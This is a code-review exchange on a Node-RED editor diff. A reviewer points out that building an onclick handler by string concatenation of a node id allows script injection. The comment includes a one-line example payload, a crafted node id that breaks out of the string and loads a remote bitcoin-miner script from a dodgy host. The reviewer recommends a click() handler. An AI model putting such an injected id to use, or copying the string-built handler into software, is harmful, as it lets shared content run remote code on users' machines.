editor/js/ui/tab-config.js

```diff
@@ -140,7 +140,9 @@ RED.sidebar.config = (function() {
                 var entry = $('<li class="palette_node config_node palette_node_id_'+node.id.replace(/\./g,"-")+'"></li>').appendTo(list);
                 $('<div class="palette_label"></div>').text(label).appendTo(entry);
                 if (node._def.hasUsers !== false) {
-                    var iconContainer = $('<div/>',{class:"palette_icon_container  palette_icon_container_right"}).text(node.users.length).appendTo(entry);
+                    var f = 'RED.search.show(\''+node.id+'\')'
```

Comment:
From a coding style pov, we don't set `onclick` as a String - its a potentially security exposure.

If someone shares a node with an id of `'); $.getScript("http://some-dodgy-site/bitcoin-miner.js");//` then it'll be sat there waiting for someone to click on that link and trigger the bad code.

To set a click handler on an element, the `click()` function should be used:

    $('<a href="#"/>',).click(function(e) { e.preventDefault(); RED.search.show(node.id); })

Reply:
thanks